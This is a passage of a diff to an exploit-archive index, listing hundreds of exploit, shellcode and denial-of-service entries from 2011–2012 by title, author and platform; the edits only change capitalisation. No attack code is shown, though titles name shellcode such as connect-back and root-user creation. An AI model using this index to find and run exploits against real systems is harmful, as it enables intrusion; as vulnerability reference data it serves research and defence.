Exploit",2011-11-18,hellok,windows,dos,0 18125,platforms/windows/remote/18125.rb,"Wireshark - console.lua pre-loading",2011-11-19,Metasploit,windows,remote,0 -18126,platforms/php/webapps/18126.txt,"WordPress jetpack Plugin - 'sharedaddy.php' ID SQL Injection",2011-11-19,longrifle0x,php,webapps,0 -18127,platforms/php/webapps/18127.txt,"Freelancer calendar 1.01 - SQL Injection",2011-11-19,muuratsalo,php,webapps,0 +18126,platforms/php/webapps/18126.txt,"Wordpress jetpack Plugin - 'sharedaddy.php' ID SQL Injection",2011-11-19,longrifle0x,php,webapps,0 +18127,platforms/php/webapps/18127.txt,"Freelancer Calendar 1.01 - SQL Injection",2011-11-19,muuratsalo,php,webapps,0 18128,platforms/php/webapps/18128.txt,"Valid tiny-erp 1.6 - SQL Injection",2011-11-19,muuratsalo,php,webapps,0 18129,platforms/php/webapps/18129.txt,"Blogs manager 1.101 - SQL Injection",2011-11-19,muuratsalo,php,webapps,0 18131,platforms/php/webapps/18131.txt,"ARASTAR - SQL Injection",2011-11-19,TH3_N3RD,php,webapps,0 @@ -15761,13 +15761,13 @@ id,file,description,date,author,platform,type,port 18149,platforms/php/webapps/18149.php,"PmWiki 2.2.34 - (pagelist) Remote PHP Code Injection Exploit (1)",2011-11-23,EgiX,php,webapps,0 18151,platforms/php/webapps/18151.php,"Log1CMS 2.0 - (ajax_create_folder.php) Remote Code Execution",2011-11-24,"Adel SBM",php,webapps,0 18153,platforms/cgi/webapps/18153.txt,"LibLime Koha 4.2 - Local File Inclusion",2011-11-24,"Akin Tosunlar",cgi,webapps,0 -18154,platforms/sh4/shellcode/18154.c,"Linux/SuperH (sh4) - setuid(0) ; execve(_/bin/sh__ NULL_ NULL) shellcode (27 bytes)",2011-11-24,"Jonathan Salwan",sh4,shellcode,0 +18154,platforms/sh4/shellcode/18154.c,"Linux/SuperH (sh4) - setuid(0) ; execve(_/bin/sh__ NULL_ NULL) Shellcode (27 bytes)",2011-11-24,"Jonathan Salwan",sh4,shellcode,0 18155,platforms/php/webapps/18155.txt,"Zabbix 1.8.4 - (popup.php) SQL Injection",2011-11-24,"Marcio Almeida",php,webapps,0 18156,platforms/php/webapps/18156.txt,"php video script - SQL Injection",2011-11-25,longrifle0x,php,webapps,0 18159,platforms/linux/dos/18159.py,"XChat - Heap Overflow Denial of Service",2011-11-25,"Jane Doe",linux,dos,0 -18162,platforms/linux_mips/shellcode/18162.c,"Linux/MIPS - execve /bin/sh shellcode (48 bytes)",2011-11-27,rigan,linux_mips,shellcode,0 -18163,platforms/linux_mips/shellcode/18163.c,"Linux/MIPS - Add user(UID 0) 'rOOt' with password 'pwn3d' shellcode (164 bytes)",2011-11-27,rigan,linux_mips,shellcode,0 -19400,platforms/php/webapps/19400.txt,"WordPress Website FAQ Plugin 1.0 - SQL Injection",2012-06-26,"Chris Kellum",php,webapps,0 +18162,platforms/linux_mips/shellcode/18162.c,"Linux/MIPS - execve /bin/sh Shellcode (48 bytes)",2011-11-27,rigan,linux_mips,shellcode,0 +18163,platforms/linux_mips/shellcode/18163.c,"Linux/MIPS - Add user(UID 0) 'rOOt' with password 'pwn3d' Shellcode (164 bytes)",2011-11-27,rigan,linux_mips,shellcode,0 +19400,platforms/php/webapps/19400.txt,"Wordpress Website FAQ Plugin 1.0 - SQL Injection",2012-06-26,"Chris Kellum",php,webapps,0 18165,platforms/windows/dos/18165.txt,"siemens automation license manager 500.0.122.1 - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0 18166,platforms/windows/dos/18166.txt,"Siemens SIMATIC WinCC Flexible (Runtime) - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0 18167,platforms/php/webapps/18167.zip,"JQuery-Real-Person plugin - Bypass captcha",2011-11-28,Alberto_García_Illera,php,webapps,0 @@ -15794,7 +15794,7 @@ id,file,description,date,author,platform,type,port 18200,platforms/windows/dos/18200.txt,"SopCast 3.4.7 - sop:// URI Handling Remote Stack Buffer Overflow PoC",2011-12-05,LiquidWorm,windows,dos,0 18195,platforms/windows/local/18195.rb,"CCMPlayer 1.5 - Stack based Buffer Overflow (.m3u)",2011-12-03,Metasploit,windows,local,0 18196,platforms/windows/dos/18196.py,"NJStar Communicator MiniSmtp - Buffer Overflow [ASLR Bypass]",2011-12-03,Zune,windows,dos,0 -18197,platforms/lin_x86-64/shellcode/18197.c,"Linux/x86-64 - execve(/bin/sh) shellcode (52 bytes)",2011-12-03,X-h4ck,lin_x86-64,shellcode,0 +18197,platforms/lin_x86-64/shellcode/18197.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (52 bytes)",2011-12-03,X-h4ck,lin_x86-64,shellcode,0 18199,platforms/hardware/dos/18199.pl,"ShareCenter D-Link DNS-320 - Remote reboot/shutdown/reset (Denial of Service)",2011-12-05,rigan,hardware,dos,0 18198,platforms/php/webapps/18198.php,"Family Connections CMS 2.5.0 & 2.7.1 - (less.php) Remote Command Execution",2011-12-04,mr_me,php,webapps,0 18201,platforms/windows/local/18201.txt,"SopCast 3.4.7 - (Diagnose.exe) Improper Permissions",2011-12-05,LiquidWorm,windows,local,0 @@ -15814,11 +15814,11 @@ id,file,description,date,author,platform,type,port 18223,platforms/windows/dos/18223.pl,"Free Opener - Local Denial of Service",2011-12-09,"Iolo Morganwg",windows,dos,0 18224,platforms/php/webapps/18224.php,"Docebo Lms 4.0.4 - (messages) Remote Code Execution",2011-12-09,mr_me,php,webapps,0 18225,platforms/linux/dos/18225.c,"CSF Firewall - Buffer Overflow",2011-12-09,"FoX HaCkEr",linux,dos,0 -18226,platforms/linux_mips/shellcode/18226.c,"Linux/MIPS - connect back shellcode (port 0x7a69) (168 bytes)",2011-12-10,rigan,linux_mips,shellcode,0 -18227,platforms/linux_mips/shellcode/18227.c,"Linux/MIPS - reboot() shellcode (32 bytes)",2011-12-10,rigan,linux_mips,shellcode,0 +18226,platforms/linux_mips/shellcode/18226.c,"Linux/MIPS - connect back Shellcode (port 0x7a69) (168 bytes)",2011-12-10,rigan,linux_mips,shellcode,0 +18227,platforms/linux_mips/shellcode/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,linux_mips,shellcode,0 18228,platforms/linux/local/18228.sh,"Acpid 1:2.0.10-1ubuntu2 (Ubuntu 11.04/11.10) - Boundary Crossing Privilege Escalation",2011-12-10,otr,linux,local,0 18230,platforms/php/webapps/18230.txt,"FCMS 2.7.2 CMS - Multiple Persistent Cross-Site Scripting",2011-12-10,"Ahmed Elhady Mohamed",php,webapps,0 -18231,platforms/php/webapps/18231.txt,"WordPress UPM-POLLS Plugin 1.0.4 - Blind SQL Injection",2011-12-11,Saif,php,webapps,0 +18231,platforms/php/webapps/18231.txt,"Wordpress UPM-POLLS Plugin 1.0.4 - Blind SQL Injection",2011-12-11,Saif,php,webapps,0 18232,platforms/php/webapps/18232.txt,"FCMS 2.7.2 CMS - Multiple Cross-Site Request Forgery Vulnerabilities",2011-12-11,"Ahmed Elhady Mohamed",php,webapps,0 18233,platforms/php/webapps/18233.txt,"Xoops 2.5.4 - Blind SQL Injection",2011-12-11,blkhtc0rp,php,webapps,0 18235,platforms/windows/remote/18235.pl,"zFTPServer Suite 6.0.0.52 - 'rmdir' Directory Traversal",2011-12-11,"Stefan Schurtz",windows,remote,0 @@ -15849,16 +15849,16 @@ id,file,description,date,author,platform,type,port 18272,platforms/windows/dos/18272.py,"Windows Explorer - Denial of Service (DOS)",2011-12-24,Level,windows,dos,0 18274,platforms/php/webapps/18274.txt,"openemr 4 - Multiple Vulnerabilities",2011-12-25,Level,php,webapps,0 18275,platforms/win_x86-64/dos/18275.txt,"Safari - GdiDrawStream BSoD",2011-12-18,webDEViL,win_x86-64,dos,0 -18276,platforms/php/webapps/18276.txt,"WordPress Mailing List Plugin - Arbitrary File Download",2011-12-26,6Scan,php,webapps,0 +18276,platforms/php/webapps/18276.txt,"Wordpress Mailing List Plugin - Arbitrary File Download",2011-12-26,6Scan,php,webapps,0 18277,platforms/php/webapps/18277.txt,"Free Image Hosting Script - Arbitrary File Upload",2011-12-26,ySecurity,php,webapps,0 18278,platforms/linux/dos/18278.txt,"Nagios Plugin check_ups - Local Buffer Overflow PoC",2011-12-26,"Stefan Schurtz",linux,dos,0 -18280,platforms/linux/remote/18280.c,"Telnetd encrypt_keyid - Remote Root Function Pointer Overwrite",2011-12-26,"NighterMan and BatchDrake",linux,remote,0 +18280,platforms/linux/remote/18280.c,"TelnetD encrypt_keyid - Remote Root Function Pointer Overwrite",2011-12-26,"NighterMan and BatchDrake",linux,remote,0 18283,platforms/windows/remote/18283.rb,"CoCSoft Stream Down 6.8.0 - Universal Exploit (Metasploit)",2011-12-27,"Fady Mohammed Osman",windows,remote,0 -18412,platforms/php/webapps/18412.php,"WordPress Kish Guest Posting Plugin 1.0 - Arbitrary File Upload",2012-01-23,EgiX,php,webapps,0 +18412,platforms/php/webapps/18412.php,"Wordpress Kish Guest Posting Plugin 1.0 - Arbitrary File Upload",2012-01-23,EgiX,php,webapps,0 18287,platforms/php/webapps/18287.php,"Joomla Module Simple File Upload 1.3 - Remote Code Execution",2011-12-28,gmda,php,webapps,0 18285,platforms/windows/dos/18285.py,"VLC 1.1.11 - (libav) libavcodec_plugin.dll Denial of Service",2011-12-28,"Mitchell Adair",windows,dos,0 18288,platforms/php/webapps/18288.txt,"DIY-CMS blog mod - SQL Injection",2011-12-29,snup,php,webapps,0 -18290,platforms/php/webapps/18290.txt,"Winn Guestbook 2.4.8c - Persistent Cross-Site Scripting",2011-12-29,G13,php,webapps,0 +18290,platforms/php/webapps/18290.txt,"Winn GuestBook 2.4.8c - Persistent Cross-Site Scripting",2011-12-29,G13,php,webapps,0 18291,platforms/hardware/remote/18291.txt,"Reaver - WiFi Protected Setup (WPS) Exploit",2011-12-30,cheffner,hardware,remote,0 18292,platforms/php/webapps/18292.txt,"Dede CMS - SQL Injection",2011-12-30,"CWH and Nafsh",php,webapps,0 18293,platforms/php/webapps/18293.txt,"Akiva WebBoard 8.x - SQL Injection",2011-12-30,"Alexander Fuchs",php,webapps,0 @@ -15888,7 +15888,7 @@ id,file,description,date,author,platform,type,port 18327,platforms/netware/dos/18327.txt,"Novell Netware - XNFS.NLM NFS Rename Remote Code Execution",2012-01-06,"Francis Provencher",netware,dos,0 18328,platforms/netware/dos/18328.txt,"Novell Netware - XNFS.NLM STAT Notify Remote Code Execution",2012-01-06,"Francis Provencher",netware,dos,0 18329,platforms/multiple/webapps/18329.txt,"Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities",2012-01-06,"SEC Consult",multiple,webapps,0 -18330,platforms/php/webapps/18330.txt,"WordPress Plugin pay with tweet 1.1 - Multiple Vulnerabilities",2012-01-06,"Gianluca Brindisi",php,webapps,0 +18330,platforms/php/webapps/18330.txt,"Wordpress Plugin pay with tweet 1.1 - Multiple Vulnerabilities",2012-01-06,"Gianluca Brindisi",php,webapps,0 18334,platforms/windows/local/18334.py,"Microsoft Office 2003 Home/Pro - Code Execution",2012-01-08,"b33f & g11tch",windows,local,0 18335,platforms/php/webapps/18335.txt,"MangosWeb - SQL Injection",2012-01-08,Hood3dRob1n,php,webapps,0 18336,platforms/hardware/dos/18336.pl,"AirTies-4450 - Unauthorized Remote Reboot",2012-01-08,rigan,hardware,dos,0 @@ -15904,12 +15904,12 @@ id,file,description,date,author,platform,type,port 18347,platforms/php/webapps/18347.txt,"Pragyan CMS 3.0 - Remote File Disclosure",2012-01-10,Or4nG.M4N,php,webapps,0 18348,platforms/php/webapps/18348.txt,"w-cms 2.01 - Multiple Vulnerabilities",2012-01-10,th3.g4m3_0v3r,php,webapps,0 18349,platforms/windows/local/18349.pl,"Blade API Monitor 3.6.9.2 - Unicode Stack Buffer Overflow",2012-01-10,FullMetalFouad,windows,local,0 -18350,platforms/php/webapps/18350.txt,"WordPress Age Verification Plugin 0.4 - Open Redirect",2012-01-10,"Gianluca Brindisi",php,webapps,0 +18350,platforms/php/webapps/18350.txt,"Wordpress Age Verification Plugin 0.4 - Open Redirect",2012-01-10,"Gianluca Brindisi",php,webapps,0 18351,platforms/netware/dos/18351.txt,"Novell Netware - XNFS caller_name xdrDecodeString Remote Code Execution",2012-01-10,"Francis Provencher",netware,dos,0 18352,platforms/php/webapps/18352.txt,"YABSoft Advanced Image Hosting Script - SQL Injection",2012-01-12,"Robert Cooper",php,webapps,0 -18353,platforms/php/webapps/18353.txt,"WordPress wp-autoyoutube plugin - Blind SQL Injection",2012-01-12,longrifle0x,php,webapps,0 +18353,platforms/php/webapps/18353.txt,"Wordpress wp-autoyoutube plugin - Blind SQL Injection",2012-01-12,longrifle0x,php,webapps,0 18354,platforms/windows/remote/18354.py,"WorldMail IMAPd 3.0 - SEH Overflow (Egg Hunter)",2012-01-12,TheXero,windows,remote,0 -18355,platforms/php/webapps/18355.txt,"WordPress Count-per-day plugin - Multiple Vulnerabilities",2012-01-12,6Scan,php,webapps,0 +18355,platforms/php/webapps/18355.txt,"Wordpress Count-per-day plugin - Multiple Vulnerabilities",2012-01-12,6Scan,php,webapps,0 18356,platforms/php/webapps/18356.txt,"Tine 2.0 - Maischa - Multiple Cross-Site Scripting Vulnerabilities",2012-01-13,Vulnerability-Lab,php,webapps,0 18357,platforms/php/webapps/18357.txt,"Pragyan CMS 2.6.1 - Arbitrary File Upload",2012-01-13,Dr.KroOoZ,php,webapps,0 18373,platforms/jsp/webapps/18373.txt,"Cloupia End-to-end FlexPod Management - Directory Traversal",2012-01-15,"Chris Rock",jsp,webapps,0 @@ -15926,7 +15926,7 @@ id,file,description,date,author,platform,type,port 18369,platforms/bsd/remote/18369.rb,"FreeBSD Telnet Service - Encryption Key ID Buffer Overflow",2012-01-14,Metasploit,bsd,remote,0 18377,platforms/osx/remote/18377.rb,"Mozilla Firefox 3.6.16 - mChannel use after free (2)",2012-01-17,Metasploit,osx,remote,0 18378,platforms/linux/dos/18378.c,"Linux IGMP - Remote Denial of Service (Introduced in linux-2.6.36)",2012-01-17,kingcope,linux,dos,0 -18379,platforms/lin_x86/shellcode/18379.c,"Linux/x86 - Search For php/html Writable Files and Add Your Code shellcode (380+ bytes)",2012-01-17,rigan,lin_x86,shellcode,0 +18379,platforms/lin_x86/shellcode/18379.c,"Linux/x86 - Search For php/html Writable Files and Add Your Code Shellcode (380+ bytes)",2012-01-17,rigan,lin_x86,shellcode,0 18380,platforms/php/webapps/18380.txt,"Joomla Discussions Component (com_discussions) - SQL Injection",2012-01-17,"Red Security TEAM",php,webapps,0 18975,platforms/php/webapps/18975.rb,"Log1 CMS - writeInfo() PHP Code Injection",2012-06-03,Metasploit,php,webapps,0 18976,platforms/php/dos/18976.php,"PHP 5.3.10 - spl_autoload() Local Denial of Service",2012-06-03,"Yakir Wizman",php,dos,0 @@ -15938,7 +15938,7 @@ id,file,description,date,author,platform,type,port 18386,platforms/php/webapps/18386.txt,"DZCP (deV!L_z Clanportal) 1.5.5 Moviebase Addon - Blind SQL Injection",2012-01-18,"Easy Laster",php,webapps,0 18388,platforms/windows/remote/18388.rb,"HP OpenView Network Node Manager - ov.dll _OVBuildPath Buffer Overflow",2012-01-20,Metasploit,windows,remote,0 18389,platforms/php/webapps/18389.txt,"Drupal CKEditor 3.0 < 3.6.2 - Persistent EventHandler Cross-Site Scripting",2012-01-19,MaXe,php,webapps,0 -18390,platforms/php/webapps/18390.txt,"WordPress Plugin ucan post 1.0.09 - Persistent Cross-Site Scripting",2012-01-19,"Gianluca Brindisi",php,webapps,0 +18390,platforms/php/webapps/18390.txt,"Wordpress Plugin ucan post 1.0.09 - Persistent Cross-Site Scripting",2012-01-19,"Gianluca Brindisi",php,webapps,0 18700,platforms/php/webapps/18700.txt,"e-ticketing - SQL Injection",2012-04-04,"Mark Stanislav",php,webapps,0 18392,platforms/php/webapps/18392.php,"appRain CMF 0.1.5 - (uploadify.php) Unrestricted File Upload Exploit",2012-01-19,EgiX,php,webapps,0 18393,platforms/linux/remote/18393.rb,"Gitorious - Arbitrary Command Execution",2012-01-20,Metasploit,linux,remote,0 @@ -15953,7 +15953,7 @@ id,file,description,date,author,platform,type,port 18399,platforms/windows/dos/18399.py,"VLC 1.2.0 - (libtaglib_pluggin.dll) Denial of Service",2012-01-20,"Mitchell Adair",windows,dos,0 18405,platforms/asp/webapps/18405.txt,"ARYADAD - Multiple Vulnerabilities",2012-01-21,"Red Security TEAM",asp,webapps,0 18411,platforms/linux/local/18411.c,"Linux Kernel 2.6.39 <= 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper.c' Privilege Escalation (1)",2012-01-23,zx2c4,linux,local,0 -18407,platforms/php/webapps/18407.txt,"AllWebMenus < 1.1.9 WordPress Menu Plugin - Arbitrary File Upload",2012-01-22,6Scan,php,webapps,0 +18407,platforms/php/webapps/18407.txt,"AllWebMenus < 1.1.9 Wordpress Menu Plugin - Arbitrary File Upload",2012-01-22,6Scan,php,webapps,0 18410,platforms/php/webapps/18410.txt,"miniCMS 1.0 & 2.0 - PHP Code Inject",2012-01-22,Or4nG.M4N,php,webapps,0 18698,platforms/windows/dos/18698.py,"Xion Audio Player 1.0.127 - (.aiff) Denial of Service",2012-04-04,condis,windows,dos,0 18699,platforms/php/webapps/18699.txt,"PlumeCMS 1.2.4 - Multiple Persistent Cross-Site Scripting",2012-04-04,"Ivano Binetti",php,webapps,0 @@ -15961,9 +15961,9 @@ id,file,description,date,author,platform,type,port 18413,platforms/php/webapps/18413.txt,"SpamTitan Application 5.08x - SQL Injection",2012-01-23,Vulnerability-Lab,php,webapps,0 18701,platforms/php/webapps/18701.txt,"phpPaleo - Local File Inclusion",2012-04-04,"Mark Stanislav",php,webapps,0 18416,platforms/jsp/webapps/18416.txt,"stoneware webnetwork6 - Multiple Vulnerabilities",2012-01-24,"Jacob Holcomb",jsp,webapps,0 -18417,platforms/php/webapps/18417.txt,"WordPress 3.3.1 - Multiple Vulnerabilities",2012-01-25,"Trustwave's SpiderLabs",php,webapps,0 +18417,platforms/php/webapps/18417.txt,"Wordpress 3.3.1 - Multiple Vulnerabilities",2012-01-25,"Trustwave's SpiderLabs",php,webapps,0 18418,platforms/php/webapps/18418.html,"VR GPub 4.0 - Cross-Site Request Forgery",2012-01-26,Cyber-Crystal,php,webapps,0 -18419,platforms/php/webapps/18419.html,"phplist 2.10.9 - Cross-Site Request Forgery / Cross-Site Scripting",2012-01-26,Cyber-Crystal,php,webapps,0 +18419,platforms/php/webapps/18419.html,"phpList 2.10.9 - Cross-Site Request Forgery / Cross-Site Scripting",2012-01-26,Cyber-Crystal,php,webapps,0 18420,platforms/windows/remote/18420.rb,"Sysax Multi Server 5.50 - Create Folder Remote Code Execution Buffer Overflow (Metasploit)",2012-01-26,"Craig Freyman",windows,remote,0 18422,platforms/php/webapps/18422.txt,"Peel SHOPPING 2.8/ 2.9 - Cross-Site Scripting / SQL Injections",2012-01-26,Cyber-Crystal,php,webapps,0 18423,platforms/windows/remote/18423.rb,"HP Diagnostics Server - magentservice.exe Overflow",2012-01-27,Metasploit,windows,remote,0 @@ -15993,7 +15993,7 @@ id,file,description,date,author,platform,type,port 18452,platforms/multiple/webapps/18452.txt,"Apache Struts - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-02-02,"SecPod Research",multiple,webapps,0 18453,platforms/windows/dos/18453.txt,"OfficeSIP Server 3.1 - Denial of Service",2012-02-02,"SecPod Research",windows,dos,0 18454,platforms/windows/dos/18454.txt,"NetSarang Xlpd Printer Daemon 4 - Denial of Service",2012-02-02,"SecPod Research",windows,dos,0 -18455,platforms/php/webapps/18455.txt,"OSCommerce 3.0.2 - Persistent Cross-Site",2012-02-02,Vulnerability-Lab,php,webapps,0 +18455,platforms/php/webapps/18455.txt,"osCommerce 3.0.2 - Persistent Cross-Site",2012-02-02,Vulnerability-Lab,php,webapps,0 18456,platforms/php/webapps/18456.txt,"Achievo 1.4.3 - Multiple Web Vulnerabilities",2012-02-02,Vulnerability-Lab,php,webapps,0 18457,platforms/linux/dos/18457.py,"torrent-stats - httpd.c Denial of Service",2012-02-03,otr,linux,dos,0 18458,platforms/php/dos/18458.txt,"PHP 5.4SVN-2012-02-03 - htmlspecialchars/entities Buffer Overflow",2012-02-03,cataphract,php,dos,0 @@ -16042,7 +16042,7 @@ id,file,description,date,author,platform,type,port 18508,platforms/php/webapps/18508.txt,"Limesurvey (PHPSurveyor 1.91+ stable) - Blind SQL Injection",2012-02-22,TorTukiTu,php,webapps,0 18513,platforms/php/webapps/18513.txt,"DFLabs PTK 1.0.5 - (Steal Authentication Credentials) Multiple Vulnerabilities",2012-02-22,"Ivano Binetti",php,webapps,0 18509,platforms/hardware/webapps/18509.html,"Dlink DCS series - Cross-Site Request Forgery Change Admin Password",2012-02-22,rigan,hardware,webapps,0 -18510,platforms/windows/webapps/18510.txt,"webcamxp and webcam 7 - Directory Traversal",2012-02-22,Silent_Dream,windows,webapps,0 +18510,platforms/windows/webapps/18510.txt,"WebcamXP and webcam 7 - Directory Traversal",2012-02-22,Silent_Dream,windows,webapps,0 18511,platforms/hardware/webapps/18511.txt,"D-Link DSL-2640B - Authentication Bypass",2012-02-22,"Ivano Binetti",hardware,webapps,0 18512,platforms/windows/dos/18512.txt,"Unity 3D Web Player 3.2.0.61061 - Denial of Service",2012-02-22,"Luigi Auriemma",windows,dos,0 18514,platforms/windows/remote/18514.rb,"TrendMicro Control Manger 5.5 - CmdProcessor.exe Stack Buffer Overflow",2012-02-23,Metasploit,windows,remote,0 @@ -16075,7 +16075,7 @@ id,file,description,date,author,platform,type,port 18560,platforms/php/webapps/18560.txt,"Symfony2 - Local File Disclosure",2012-03-05,"Sense of Security",php,webapps,0 18546,platforms/windows/dos/18546.txt,"Novell Groupwise - Address Book Remote Code Execution",2012-03-01,"Francis Provencher",windows,dos,0 18548,platforms/windows/local/18548.rb,"VLC Media Player - RealText Subtitle Overflow",2012-03-02,Metasploit,windows,local,0 -18549,platforms/php/webapps/18549.txt,"phxEventManager 2.0 beta 5 - search.php search_terms SQL Injection",2012-03-02,skysbsb,php,webapps,0 +18549,platforms/php/webapps/18549.txt,"phxEventManager 2.0 Beta 5 - search.php search_terms SQL Injection",2012-03-02,skysbsb,php,webapps,0 18565,platforms/php/remote/18565.rb,"LotusCMS 3.0 - eval() Remote Command Execution",2012-03-07,Metasploit,php,remote,0 18564,platforms/php/webapps/18564.txt,"Drupal CMS 7.12 - Multiple Vulnerabilities",2012-03-02,"Ivano Binetti",php,webapps,0 18552,platforms/windows/dos/18552.pl,"Passport PC To Host - Malformed .zws file Memory Corruption",2012-03-03,Silent_Dream,windows,dos,0 @@ -16100,14 +16100,14 @@ id,file,description,date,author,platform,type,port 18582,platforms/cgi/webapps/18582.txt,"Zend Server 5.6.0 - Multiple Remote Script Insertion Vulnerabilities",2012-03-12,LiquidWorm,cgi,webapps,0 18583,platforms/php/webapps/18583.txt,"Saman Portal - Local File Inclusion",2012-03-12,TMT,php,webapps,0 18584,platforms/windows/dos/18584.txt,"GOM Media Player 2.1.37 - Buffer Overflow",2012-03-12,longrifle0x,windows,dos,0 -18585,platforms/lin_x86-64/shellcode/18585.s,"Linux/x86-64 - Add user _t0r_ with password _Winner_ shellcode (189 bytes)",2012-03-12,0_o,lin_x86-64,shellcode,0 +18585,platforms/lin_x86-64/shellcode/18585.s,"Linux/x86-64 - Add user _t0r_ with password _Winner_ Shellcode (189 bytes)",2012-03-12,0_o,lin_x86-64,shellcode,0 18586,platforms/windows/dos/18586.txt,"XnView FlashPix Image Processing - Heap Overflow",2012-03-12,"Francis Provencher",windows,dos,0 18587,platforms/windows/dos/18587.py,"Network Instrument Observer - SNMP SetRequest Denial of Service",2012-03-12,"Francis Provencher",windows,dos,0 18616,platforms/php/webapps/18616.txt,"Pre Printing Press - product_desc.php 'pid' SQL Injection",2012-03-18,"Easy Laster",php,webapps,0 18618,platforms/php/webapps/18618.pl,"Joomla 2.5.0-2.5.1 - Time Based SQL Injection",2012-03-19,"A. Ramos",php,webapps,0 18619,platforms/multiple/remote/18619.txt,"Apache Tomcat - Remote Exploit (PUT Request) and Account Scanner",2012-03-19,kingcope,multiple,remote,0 -18589,platforms/php/webapps/18589.txt,"Acal calendar 2.2.6 - Cross-Site Request Forgery",2012-03-12,"Number 7",php,webapps,0 -18595,platforms/php/webapps/18595.txt,"Max Guestbook 1.0 - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0 +18589,platforms/php/webapps/18589.txt,"Acal Calendar 2.2.6 - Cross-Site Request Forgery",2012-03-12,"Number 7",php,webapps,0 +18595,platforms/php/webapps/18595.txt,"Max GuestBook 1.0 - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0 18590,platforms/php/webapps/18590.txt,"PBLang - Local File Inclusion",2012-03-13,"Number 7",php,webapps,0 18591,platforms/php/webapps/18591.txt,"Cycade Gallery - SQL Injection",2012-03-13,-DownFall,php,webapps,0 18592,platforms/php/webapps/18592.txt,"4Images - Image Gallery Management System - Cross-Site Request Forgery",2012-03-13,"Dmar al3noOoz",php,webapps,0 @@ -16189,7 +16189,7 @@ id,file,description,date,author,platform,type,port 18687,platforms/php/webapps/18687.txt,"Landshop 0.9.2 - Multiple Web Vulnerabilities",2012-03-31,Vulnerability-Lab,php,webapps,0 18688,platforms/hardware/dos/18688.txt,"EMC Data Protection Advisor 5.8.1 - Denial of Service",2012-03-31,"Luigi Auriemma",hardware,dos,0 18689,platforms/php/webapps/18689.txt,"Woltlab Burning Board 2.2 / 2.3 - [WN]KT KickTipp 3.1 - SQL Injection",2012-03-31,"Easy Laster",php,webapps,0 -18690,platforms/php/webapps/18690.txt,"Buddypress plugin of WordPress - SQL Injection",2012-03-31,"Ivan Terkin",php,webapps,0 +18690,platforms/php/webapps/18690.txt,"Buddypress plugin of Wordpress - SQL Injection",2012-03-31,"Ivan Terkin",php,webapps,0 18691,platforms/windows/dos/18691.rb,"FoxPlayer 2.6.0 - Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",windows,dos,0 18692,platforms/linux/dos/18692.rb,"SnackAmp 3.1.3 - (.aiff) Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",linux,dos,0 18693,platforms/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional - SEH & DEP & ASLR",2012-04-03,b33f,windows,local,0 @@ -16259,11 +16259,11 @@ id,file,description,date,author,platform,type,port 18783,platforms/linux/local/18783.txt,"mount.cifs - chdir() Arbitrary Root File Identification",2012-04-25,Sha0,linux,local,0 18788,platforms/php/webapps/18788.txt,"php volunteer management 1.0.2 - Multiple Vulnerabilities",2012-04-26,G13,php,webapps,0 18785,platforms/linux/local/18785.txt,"Parallels PLESK 9.x - Insecure Permissions",2012-04-26,"Nicolas Krassas",linux,local,0 -18787,platforms/php/webapps/18787.txt,"WordPress Zingiri Web Shop Plugin 2.4.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-04-26,"Mehmet Ince",php,webapps,0 +18787,platforms/php/webapps/18787.txt,"Wordpress Zingiri Web Shop Plugin 2.4.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-04-26,"Mehmet Ince",php,webapps,0 18797,platforms/linux/webapps/18797.rb,"WebCalendar 1.2.4 - Pre-Authenticated Remote Code Injection",2012-04-29,Metasploit,linux,webapps,0 18798,platforms/php/webapps/18798.txt,"Soco CMS - Local File Inclusion",2012-04-29,"BHG Security Center",php,webapps,0 18799,platforms/windows/dos/18799.py,"Remote-Anything Player 5.60.15 - Denial of Service",2012-04-29,"Saint Patrick",windows,dos,0 -18791,platforms/php/webapps/18791.txt,"WordPress 3.3.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2012-04-27,"Ivano Binetti",php,webapps,0 +18791,platforms/php/webapps/18791.txt,"Wordpress 3.3.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2012-04-27,"Ivano Binetti",php,webapps,0 18792,platforms/windows/local/18792.rb,"CPE17 Autorun Killer 1.7.1 - Stack Buffer Overflow (Metasploit)",2012-04-27,"Xenithz xpt",windows,local,0 18793,platforms/php/webapps/18793.txt,"Axous 1.1.0 - SQL Injection",2012-04-27,"H4ckCity Secuirty TeaM",php,webapps,0 18833,platforms/windows/remote/18833.rb,"Solarwinds Storage Manager 5.1.0 - SQL Injection",2012-05-04,Metasploit,windows,remote,0 @@ -16274,7 +16274,7 @@ id,file,description,date,author,platform,type,port 18803,platforms/php/webapps/18803.txt,"Opial CMS 2.0 - Multiple Vulnerabilities",2012-04-30,Vulnerability-Lab,php,webapps,0 18804,platforms/php/webapps/18804.txt,"DIY CMS 1.0 Poll - Multiple Vulnerabilities",2012-04-30,Vulnerability-Lab,php,webapps,0 18805,platforms/windows/remote/18805.txt,"McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 - ActiveX GetObject() Exploit",2012-04-30,rgod,windows,remote,0 -18806,platforms/php/webapps/18806.txt,"WordPress Zingiri Web Shop Plugin 2.4.2 - Persistent Cross-Site Scripting",2012-05-01,"Mehmet Ince",php,webapps,0 +18806,platforms/php/webapps/18806.txt,"Wordpress Zingiri Web Shop Plugin 2.4.2 - Persistent Cross-Site Scripting",2012-05-01,"Mehmet Ince",php,webapps,0 18814,platforms/php/webapps/18814.txt,"MyClientBase 0.12 - Multiple Vulnerabilities",2012-05-01,Vulnerability-Lab,php,webapps,0 18808,platforms/windows/local/18808.html,"SAMSUNG NET-i Viewer 1.37 - SEH Overwrite",2012-05-01,blake,windows,local,0 18809,platforms/php/webapps/18809.txt,"GENU CMS 2012.3 - Multiple SQL Injections",2012-05-01,Vulnerability-Lab,php,webapps,0 @@ -16296,9 +16296,9 @@ id,file,description,date,author,platform,type,port 